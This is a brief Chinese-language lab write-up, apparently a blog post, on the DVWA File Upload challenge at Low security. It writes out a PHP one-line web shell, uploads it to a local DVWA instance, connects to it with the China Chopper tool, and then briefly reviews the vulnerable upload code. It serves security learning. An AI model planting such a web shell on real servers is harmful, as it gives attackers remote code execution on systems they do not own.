1. 程式人生 > >程式碼審計—DWVA—File Upload—Low

程式碼審計—DWVA—File Upload—Low

0x00 前言

如飢似渴的學習ing。
你可能需要看看:
https://blog.csdn.net/qq_36869808/article/details/83029980

0x01 start

1.黑盒

在這裡插入圖片描述

首先我們需要製作一個php的一句話木馬。

<?php @eval($_POST["dudu"])?>

然後上傳。
在這裡插入圖片描述
返回一個上傳路徑。

127.0.0.1/DVWA-master//hackable/uploads/dudu.php

然後用菜刀連線
在這裡插入圖片描述
在這裡插入圖片描述

2.白盒

在這裡插入圖片描述
DVWA_WEB_PAGE_TO_ROOT
這裡這個就是獲取當前的路徑。

basename
在這裡插入圖片描述


_FILES
獲取檔案變數。

move_uploaded_file
在這裡插入圖片描述

其實這些漏洞都需要對那個變數進行過濾才可以。